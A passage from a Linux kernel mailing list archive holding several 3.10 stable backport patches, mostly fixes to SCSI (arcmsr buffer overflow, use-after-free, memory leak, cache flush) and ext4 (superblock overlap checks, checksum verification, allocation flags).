 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/scsi/scsi_scan.c b/drivers/scsi/scsi_scan.c
index 8592404..92d4f65 100644
--- a/drivers/scsi/scsi_scan.c
+++ b/drivers/scsi/scsi_scan.c
@@ -1517,12 +1517,12 @@ static int scsi_report_lun_scan(struct scsi_target *starget, int bflags,
  out_err:
 	kfree(lun_data);
  out:
-	scsi_device_put(sdev);
 	if (scsi_device_created(sdev))
 		/*
 		 * the sdev we used didn't appear in the report luns scan
 		 */
 		__scsi_remove_device(sdev);
+	scsi_device_put(sdev);
 	return ret;
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 147/319] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (45 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 146/319] scsi: Fix use-after-free Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 148/319] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded Willy Tarreau
                   ` (171 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Martin K . Petersen, Jiri Slaby, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 7bc2b55a5c030685b399bb65b6baa9ccc3d1f167 upstream.

We need to put an upper bound on "user_len" so the memcpy() doesn't
overflow.

[js] no ARCMSR_API_DATA_BUFLEN defined, use the number

Reported-by: Marco Grassi <marco.gra@gmail.com>
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Reviewed-by: Tomas Henzl <thenzl@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/arcmsr/arcmsr_hba.c | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
index 1822cb9..66dda86 100644
--- a/drivers/scsi/arcmsr/arcmsr_hba.c
+++ b/drivers/scsi/arcmsr/arcmsr_hba.c
@@ -1803,7 +1803,8 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb,
 
 	case ARCMSR_MESSAGE_WRITE_WQBUFFER: {
 		unsigned char *ver_addr;
-		int32_t my_empty_len, user_len, wqbuf_firstindex, wqbuf_lastindex;
+		uint32_t user_len;
+		int32_t my_empty_len, wqbuf_firstindex, wqbuf_lastindex;
 		uint8_t *pQbuffer, *ptmpuserbuffer;
 
 		ver_addr = kmalloc(1032, GFP_ATOMIC);
@@ -1820,6 +1821,11 @@ static int arcmsr_iop_message_xfer(struct AdapterControlBlock *acb,
 		}
 		ptmpuserbuffer = ver_addr;
 		user_len = pcmdmessagefld->cmdmessage.Length;
+		if (user_len > 1032) {
+			retvalue = ARCMSR_MESSAGE_FAIL;
+			kfree(ver_addr);
+			goto message_out;
+		}
 		memcpy(ptmpuserbuffer, pcmdmessagefld->messagedatabuffer, user_len);
 		wqbuf_lastindex = acb->wqbuf_lastindex;
 		wqbuf_firstindex = acb->wqbuf_firstindex;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 148/319] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (46 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 147/319] scsi: arcmsr: Buffer overflow in arcmsr_iop_message_xfer() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 149/319] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware Willy Tarreau
                   ` (170 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ewan D. Milne, Martin K . Petersen, Willy Tarreau

From: "Ewan D. Milne" <emilne@redhat.com>

commit 4d2b496f19f3c2cfaca1e8fa0710688b5ff3811d upstream.

map_storep was not being vfree()'d in the module_exit call.

Signed-off-by: Ewan D. Milne <emilne@redhat.com>
Reviewed-by: Laurence Oberman <loberman@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/scsi_debug.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/scsi/scsi_debug.c b/drivers/scsi/scsi_debug.c
index 0a537a0..be86e7a 100644
--- a/drivers/scsi/scsi_debug.c
+++ b/drivers/scsi/scsi_debug.c
@@ -3504,6 +3504,7 @@ static void __exit scsi_debug_exit(void)
 	bus_unregister(&pseudo_lld_bus);
 	root_device_unregister(pseudo_primary);
 
+	vfree(map_storep);
 	if (dif_storep)
 		vfree(dif_storep);
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 149/319] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (47 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 148/319] scsi: scsi_debug: Fix memory leak if LBP enabled and module is unloaded Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 150/319] ext4: validate that metadata blocks do not overlap superblock Willy Tarreau
                   ` (169 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Ching Huang, Martin K . Petersen, Willy Tarreau

From: Ching Huang <ching2048@areca.com.tw>

commit 2bf7dc8443e113844d078fd6541b7f4aa544f92f upstream.

The arcmsr driver failed to pass SYNCHRONIZE CACHE to controller
firmware. Depending on how drive caches are handled internally by
controller firmware this could potentially lead to data integrity
problems.

Ensure that cache flushes are passed to the controller.

[mkp: applied by hand and removed unused vars]

Signed-off-by: Ching Huang <ching2048@areca.com.tw>
Reported-by: Tomas Henzl <thenzl@redhat.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/scsi/arcmsr/arcmsr_hba.c | 9 ---------
 1 file changed, 9 deletions(-)

diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
index 66dda86..8d9477c 100644
--- a/drivers/scsi/arcmsr/arcmsr_hba.c
+++ b/drivers/scsi/arcmsr/arcmsr_hba.c
@@ -2069,18 +2069,9 @@ static int arcmsr_queue_command_lck(struct scsi_cmnd *cmd,
 	struct AdapterControlBlock *acb = (struct AdapterControlBlock *) host->hostdata;
 	struct CommandControlBlock *ccb;
 	int target = cmd->device->id;
-	int lun = cmd->device->lun;
-	uint8_t scsicmd = cmd->cmnd[0];
 	cmd->scsi_done = done;
 	cmd->host_scribble = NULL;
 	cmd->result = 0;
-	if ((scsicmd == SYNCHRONIZE_CACHE) ||(scsicmd == SEND_DIAGNOSTIC)){
-		if(acb->devstate[target][lun] == ARECA_RAID_GONE) {
-    			cmd->result = (DID_NO_CONNECT << 16);
-		}
-		cmd->scsi_done(cmd);
-		return 0;
-	}
 	if (target == 16) {
 		/* virtual device for iop message transfer */
 		arcmsr_handle_virtual_command(acb, cmd);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 150/319] ext4: validate that metadata blocks do not overlap superblock
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (48 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 149/319] scsi: arcmsr: Send SYNCHRONIZE_CACHE command to firmware Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 151/319] ext4: avoid modifying checksum fields directly during checksum verification Willy Tarreau
                   ` (168 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Theodore Ts'o, Willy Tarreau

From: Theodore Ts'o <tytso@mit.edu>

commit 829fa70dddadf9dd041d62b82cd7cea63943899d upstream.

A number of fuzzing failures seem to be caused by allocation bitmaps
or other metadata blocks being pointed at the superblock.

This can cause kernel BUG or WARNings once the superblock is
overwritten, so validate the group descriptor blocks to make sure this
doesn't happen.

Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/super.c | 18 +++++++++++++++++-
 1 file changed, 17 insertions(+), 1 deletion(-)

diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index 15a8189..a6966c9 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -2002,6 +2002,7 @@ void ext4_group_desc_csum_set(struct super_block *sb, __u32 block_group,
 
 /* Called at mount-time, super-block is locked */
 static int ext4_check_descriptors(struct super_block *sb,
+				  ext4_fsblk_t sb_block,
 				  ext4_group_t *first_not_zeroed)
 {
 	struct ext4_sb_info *sbi = EXT4_SB(sb);
@@ -2032,6 +2033,11 @@ static int ext4_check_descriptors(struct super_block *sb,
 			grp = i;
 
 		block_bitmap = ext4_block_bitmap(sb, gdp);
+		if (block_bitmap == sb_block) {
+			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
+				 "Block bitmap for group %u overlaps "
+				 "superblock", i);
+		}
 		if (block_bitmap < first_block || block_bitmap > last_block) {
 			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
 			       "Block bitmap for group %u not in group "
@@ -2039,6 +2045,11 @@ static int ext4_check_descriptors(struct super_block *sb,
 			return 0;
 		}
 		inode_bitmap = ext4_inode_bitmap(sb, gdp);
+		if (inode_bitmap == sb_block) {
+			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
+				 "Inode bitmap for group %u overlaps "
+				 "superblock", i);
+		}
 		if (inode_bitmap < first_block || inode_bitmap > last_block) {
 			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
 			       "Inode bitmap for group %u not in group "
@@ -2046,6 +2057,11 @@ static int ext4_check_descriptors(struct super_block *sb,
 			return 0;
 		}
 		inode_table = ext4_inode_table(sb, gdp);
+		if (inode_table == sb_block) {
+			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
+				 "Inode table for group %u overlaps "
+				 "superblock", i);
+		}
 		if (inode_table < first_block ||
 		    inode_table + sbi->s_itb_per_group - 1 > last_block) {
 			ext4_msg(sb, KERN_ERR, "ext4_check_descriptors: "
@@ -3766,7 +3782,7 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
 			goto failed_mount2;
 		}
 	}
-	if (!ext4_check_descriptors(sb, &first_not_zeroed)) {
+	if (!ext4_check_descriptors(sb, logical_sb_block, &first_not_zeroed)) {
 		ext4_msg(sb, KERN_ERR, "group descriptors corrupted!");
 		goto failed_mount2;
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 151/319] ext4: avoid modifying checksum fields directly during checksum verification
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (49 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 150/319] ext4: validate that metadata blocks do not overlap superblock Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 152/319] ext4: use __GFP_NOFAIL in ext4_free_blocks() Willy Tarreau
                   ` (167 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daeho Jeong, Youngjin Gil, Theodore Ts'o, Willy Tarreau

From: Daeho Jeong <daeho.jeong@samsung.com>

commit b47820edd1634dc1208f9212b7ecfb4230610a23 upstream.

We temporally change checksum fields in buffers of some types of
metadata into '0' for verifying the checksum values. By doing this
without locking the buffer, some metadata's checksums, which are
being committed or written back to the storage, could be damaged.
In our test, several metadata blocks were found with damaged metadata
checksum value during recovery process. When we only verify the
checksum value, we have to avoid modifying checksum fields directly.

Signed-off-by: Daeho Jeong <daeho.jeong@samsung.com>
Signed-off-by: Youngjin Gil <youngjin.gil@samsung.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Darrick J. Wong <darrick.wong@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/inode.c | 38 ++++++++++++++++++++++----------------
 fs/ext4/namei.c |  9 ++++-----
 fs/ext4/super.c | 18 +++++++++---------
 fs/ext4/xattr.c | 13 +++++++------
 4 files changed, 42 insertions(+), 36 deletions(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index 221b582..046e0e1 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -53,25 +53,31 @@ static __u32 ext4_inode_csum(struct inode *inode, struct ext4_inode *raw,
 			      struct ext4_inode_info *ei)
 {
 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
-	__u16 csum_lo;
-	__u16 csum_hi = 0;
 	__u32 csum;
+	__u16 dummy_csum = 0;
+	int offset = offsetof(struct ext4_inode, i_checksum_lo);
+	unsigned int csum_size = sizeof(dummy_csum);
 
-	csum_lo = le16_to_cpu(raw->i_checksum_lo);
-	raw->i_checksum_lo = 0;
-	if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE &&
-	    EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi)) {
-		csum_hi = le16_to_cpu(raw->i_checksum_hi);
-		raw->i_checksum_hi = 0;
-	}
+	csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)raw, offset);
+	csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, csum_size);
+	offset += csum_size;
+	csum = ext4_chksum(sbi, csum, (__u8 *)raw + offset,
+			   EXT4_GOOD_OLD_INODE_SIZE - offset);
 
-	csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)raw,
-			   EXT4_INODE_SIZE(inode->i_sb));
-
-	raw->i_checksum_lo = cpu_to_le16(csum_lo);
-	if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE &&
-	    EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi))
-		raw->i_checksum_hi = cpu_to_le16(csum_hi);
+	if (EXT4_INODE_SIZE(inode->i_sb) > EXT4_GOOD_OLD_INODE_SIZE) {
+		offset = offsetof(struct ext4_inode, i_checksum_hi);
+		csum = ext4_chksum(sbi, csum, (__u8 *)raw +
+				   EXT4_GOOD_OLD_INODE_SIZE,
+				   offset - EXT4_GOOD_OLD_INODE_SIZE);
+		if (EXT4_FITS_IN_INODE(raw, ei, i_checksum_hi)) {
+			csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum,
+					   csum_size);
+			offset += csum_size;
+			csum = ext4_chksum(sbi, csum, (__u8 *)raw + offset,
+					   EXT4_INODE_SIZE(inode->i_sb) -
+					   offset);
+		}
+	}
 
 	return csum;
 }
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index facf8590..407bcf7 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -417,15 +417,14 @@ static __le32 ext4_dx_csum(struct inode *inode, struct ext4_dir_entry *dirent,
 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
 	struct ext4_inode_info *ei = EXT4_I(inode);
 	__u32 csum;
-	__le32 save_csum;
 	int size;
+	__u32 dummy_csum = 0;
+	int offset = offsetof(struct dx_tail, dt_checksum);
 
 	size = count_offset + (count * sizeof(struct dx_entry));
-	save_csum = t->dt_checksum;
-	t->dt_checksum = 0;
 	csum = ext4_chksum(sbi, ei->i_csum_seed, (__u8 *)dirent, size);
-	csum = ext4_chksum(sbi, csum, (__u8 *)t, sizeof(struct dx_tail));
-	t->dt_checksum = save_csum;
+	csum = ext4_chksum(sbi, csum, (__u8 *)t, offset);
+	csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, sizeof(dummy_csum));
 
 	return cpu_to_le32(csum);
 }
diff --git a/fs/ext4/super.c b/fs/ext4/super.c
index a6966c9..6cf69fa 100644
--- a/fs/ext4/super.c
+++ b/fs/ext4/super.c
@@ -1936,23 +1936,25 @@ failed:
 static __le16 ext4_group_desc_csum(struct ext4_sb_info *sbi, __u32 block_group,
 				   struct ext4_group_desc *gdp)
 {
-	int offset;
+	int offset = offsetof(struct ext4_group_desc, bg_checksum);
 	__u16 crc = 0;
 	__le32 le_group = cpu_to_le32(block_group);
 
 	if ((sbi->s_es->s_feature_ro_compat &
 	     cpu_to_le32(EXT4_FEATURE_RO_COMPAT_METADATA_CSUM))) {
 		/* Use new metadata_csum algorithm */
-		__le16 save_csum;
 		__u32 csum32;
+		__u16 dummy_csum = 0;
 
-		save_csum = gdp->bg_checksum;
-		gdp->bg_checksum = 0;
 		csum32 = ext4_chksum(sbi, sbi->s_csum_seed, (__u8 *)&le_group,
 				     sizeof(le_group));
-		csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp,
-				     sbi->s_desc_size);
-		gdp->bg_checksum = save_csum;
+		csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp, offset);
+		csum32 = ext4_chksum(sbi, csum32, (__u8 *)&dummy_csum,
+				     sizeof(dummy_csum));
+		offset += sizeof(dummy_csum);
+		if (offset < sbi->s_desc_size)
+			csum32 = ext4_chksum(sbi, csum32, (__u8 *)gdp + offset,
+					     sbi->s_desc_size - offset);
 
 		crc = csum32 & 0xFFFF;
 		goto out;
@@ -1963,8 +1965,6 @@ static __le16 ext4_group_desc_csum(struct ext4_sb_info *sbi, __u32 block_group,
 	      cpu_to_le32(EXT4_FEATURE_RO_COMPAT_GDT_CSUM)))
 		return 0;
 
-	offset = offsetof(struct ext4_group_desc, bg_checksum);
-
 	crc = crc16(~0, sbi->s_es->s_uuid, sizeof(sbi->s_es->s_uuid));
 	crc = crc16(crc, (__u8 *)&le_group, sizeof(le_group));
 	crc = crc16(crc, (__u8 *)gdp, offset);
diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
index a20816e..92850ba 100644
--- a/fs/ext4/xattr.c
+++ b/fs/ext4/xattr.c
@@ -123,17 +123,18 @@ static __le32 ext4_xattr_block_csum(struct inode *inode,
 {
 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
 	__u32 csum;
-	__le32 save_csum;
 	__le64 dsk_block_nr = cpu_to_le64(block_nr);
+	__u32 dummy_csum = 0;
+	int offset = offsetof(struct ext4_xattr_header, h_checksum);
 
-	save_csum = hdr->h_checksum;
-	hdr->h_checksum = 0;
 	csum = ext4_chksum(sbi, sbi->s_csum_seed, (__u8 *)&dsk_block_nr,
 			   sizeof(dsk_block_nr));
-	csum = ext4_chksum(sbi, csum, (__u8 *)hdr,
-			   EXT4_BLOCK_SIZE(inode->i_sb));
+	csum = ext4_chksum(sbi, csum, (__u8 *)hdr, offset);
+	csum = ext4_chksum(sbi, csum, (__u8 *)&dummy_csum, sizeof(dummy_csum));
+	offset += sizeof(dummy_csum);
+	csum = ext4_chksum(sbi, csum, (__u8 *)hdr + offset,
+			   EXT4_BLOCK_SIZE(inode->i_sb) - offset);
 
-	hdr->h_checksum = save_csum;
 	return cpu_to_le32(csum);
 }
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 152/319] ext4: use __GFP_NOFAIL in ext4_free_blocks()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (50 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 151/319] ext4: avoid modifying checksum fields directly during checksum verification Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 153/319] ext4: reinforce check of i_dtime when clearing high fields of uid and gid Willy Tarreau
                   ` (166 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Konstantin Khlebnikov, Theodore Ts'o, Willy Tarreau

From: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>

commit adb7ef600cc9d9d15ecc934cc26af5c1379777df upstream.

This might be unexpected but pages allocated for sbi->s_buddy_cache are
charged to current memory cgroup. So, GFP_NOFS allocation could fail if
current task has been killed by OOM or if current memory cgroup has no
free memory left. Block allocator cannot handle such failures here yet.

Signed-off-by: Konstantin Khlebnikov <khlebnikov@yandex-team.ru>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 fs/ext4/mballoc.c | 47 ++++++++++++++++++++++++++++-------------------
 1 file changed, 28 insertions(+), 19 deletions(-)

diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
index 08b4495..cb9eec0 100644
--- a/fs/ext4/mballoc.c
+++ b/fs/ext4/mballoc.c
@@ -808,7 +808,7 @@ static void mb_regenerate_buddy(struct ext4_buddy *e4b)
  * for this page; do not hold this lock when calling this routine!
  */
 
-static int ext4_mb_init_cache(struct page *page, char *incore)
+static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
 {
 	ext4_group_t ngroups;
 	int blocksize;
@@ -841,7 +841,7 @@ static int ext4_mb_init_cache(struct page *page, char *incore)
 	/* allocate buffer_heads to read bitmaps */
 	if (groups_per_page > 1) {
 		i = sizeof(struct buffer_head *) * groups_per_page;
-		bh = kzalloc(i, GFP_NOFS);
+		bh = kzalloc(i, gfp);
 		if (bh == NULL) {
 			err = -ENOMEM;
 			goto out;
@@ -966,7 +966,7 @@ out:
  * are on the same page e4b->bd_buddy_page is NULL and return value is 0.
  */
 static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
-		ext4_group_t group, struct ext4_buddy *e4b)
+		ext4_group_t group, struct ext4_buddy *e4b, gfp_t gfp)
 {
 	struct inode *inode = EXT4_SB(sb)->s_buddy_cache;
 	int block, pnum, poff;
@@ -985,7 +985,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
 	block = group * 2;
 	pnum = block / blocks_per_page;
 	poff = block % blocks_per_page;
-	page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+	page = find_or_create_page(inode->i_mapping, pnum, gfp);
 	if (!page)
 		return -EIO;
 	BUG_ON(page->mapping != inode->i_mapping);
@@ -999,7 +999,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
 
 	block++;
 	pnum = block / blocks_per_page;
-	page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+	page = find_or_create_page(inode->i_mapping, pnum, gfp);
 	if (!page)
 		return -EIO;
 	BUG_ON(page->mapping != inode->i_mapping);
@@ -1025,7 +1025,7 @@ static void ext4_mb_put_buddy_page_lock(struct ext4_buddy *e4b)
  * calling this routine!
  */
 static noinline_for_stack
-int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
+int ext4_mb_init_group(struct super_block *sb, ext4_group_t group, gfp_t gfp)
 {
 
 	struct ext4_group_info *this_grp;
@@ -1043,7 +1043,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
 	 * have taken a reference using ext4_mb_load_buddy and that
 	 * would have pinned buddy page to page cache.
 	 */
-	ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b);
+	ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b, gfp);
 	if (ret || !EXT4_MB_GRP_NEED_INIT(this_grp)) {
 		/*
 		 * somebody initialized the group
@@ -1053,7 +1053,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
 	}
 
 	page = e4b.bd_bitmap_page;
-	ret = ext4_mb_init_cache(page, NULL);
+	ret = ext4_mb_init_cache(page, NULL, gfp);
 	if (ret)
 		goto err;
 	if (!PageUptodate(page)) {
@@ -1073,7 +1073,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
 	}
 	/* init buddy cache */
 	page = e4b.bd_buddy_page;
-	ret = ext4_mb_init_cache(page, e4b.bd_bitmap);
+	ret = ext4_mb_init_cache(page, e4b.bd_bitmap, gfp);
 	if (ret)
 		goto err;
 	if (!PageUptodate(page)) {
@@ -1092,8 +1092,8 @@ err:
  * calling this routine!
  */
 static noinline_for_stack int
-ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
-					struct ext4_buddy *e4b)
+ext4_mb_load_buddy_gfp(struct super_block *sb, ext4_group_t group,
+		       struct ext4_buddy *e4b, gfp_t gfp)
 {
 	int blocks_per_page;
 	int block;
@@ -1123,7 +1123,7 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
 		 * we need full data about the group
 		 * to make a good selection
 		 */
-		ret = ext4_mb_init_group(sb, group);
+		ret = ext4_mb_init_group(sb, group, gfp);
 		if (ret)
 			return ret;
 	}
@@ -1151,11 +1151,11 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
 			 * wait for it to initialize.
 			 */
 			page_cache_release(page);
-		page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+		page = find_or_create_page(inode->i_mapping, pnum, gfp);
 		if (page) {
 			BUG_ON(page->mapping != inode->i_mapping);
 			if (!PageUptodate(page)) {
-				ret = ext4_mb_init_cache(page, NULL);
+				ret = ext4_mb_init_cache(page, NULL, gfp);
 				if (ret) {
 					unlock_page(page);
 					goto err;
@@ -1182,11 +1182,12 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
 	if (page == NULL || !PageUptodate(page)) {
 		if (page)
 			page_cache_release(page);
-		page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+		page = find_or_create_page(inode->i_mapping, pnum, gfp);
 		if (page) {
 			BUG_ON(page->mapping != inode->i_mapping);
 			if (!PageUptodate(page)) {
-				ret = ext4_mb_init_cache(page, e4b->bd_bitmap);
+				ret = ext4_mb_init_cache(page, e4b->bd_bitmap,
+							 gfp);
 				if (ret) {
 					unlock_page(page);
 					goto err;
@@ -1220,6 +1221,12 @@ err:
 	return ret;
 }
 
+static int ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
+			      struct ext4_buddy *e4b)
+{
+	return ext4_mb_load_buddy_gfp(sb, group, e4b, GFP_NOFS);
+}
+
 static void ext4_mb_unload_buddy(struct ext4_buddy *e4b)
 {
 	if (e4b->bd_bitmap_page)
@@ -1993,7 +2000,7 @@ static int ext4_mb_good_group(struct ext4_allocation_context *ac,
 
 	/* We only do this if the grp has never been initialized */
 	if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
-		int ret = ext4_mb_init_group(ac->ac_sb, group);
+		int ret = ext4_mb_init_group(ac->ac_sb, group, GFP_NOFS);
 		if (ret)
 			return 0;
 	}
@@ -4748,7 +4755,9 @@ do_more:
 #endif
 	trace_ext4_mballoc_free(sb, inode, block_group, bit, count_clusters);
 
-	err = ext4_mb_load_buddy(sb, block_group, &e4b);
+	/* __GFP_NOFAIL: retry infinitely, ignore TIF_MEMDIE and memcg limit. */
+	err = ext4_mb_load_buddy_gfp(sb, block_group, &e4b,
+				     GFP_NOFS|__GFP_NOFAIL);
 	if (err)
 		goto error_return;
 
@@ -5159,7 +5168,7 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
 		grp = ext4_get_group_info(sb, group);
 		/* We only do this if the grp has never been initialized */
 		if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
-			ret = ext4_mb_init_group(sb, group);
+			ret = ext4_mb_init_group(sb, group, GFP_NOFS);
 			if (ret)
 				break;
 		}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 153/319] ext4: reinforce check of i_dtime when clearing high fields of uid and gid
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (51 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 152/319] ext4: use __GFP_NOFAIL in ext4_free_blocks() Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 154/319] ext4: allow DAX writeback for hole punch Willy Tarreau
                   ` (165 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Daeho Jeong, Hobin Woo, Theodore Ts'o, Willy Tarreau

From: Daeho Jeong <daeho.jeong@samsung.com>

commit 93e3b4e6631d2a74a8cf7429138096862ff9f452 upstream.

Now, ext4_do_update_inode() clears high 16-bit fields of uid/gid
of deleted and evicted inode to fix up interoperability with old
kernels. However, it checks only i_dtime of an inode to determine
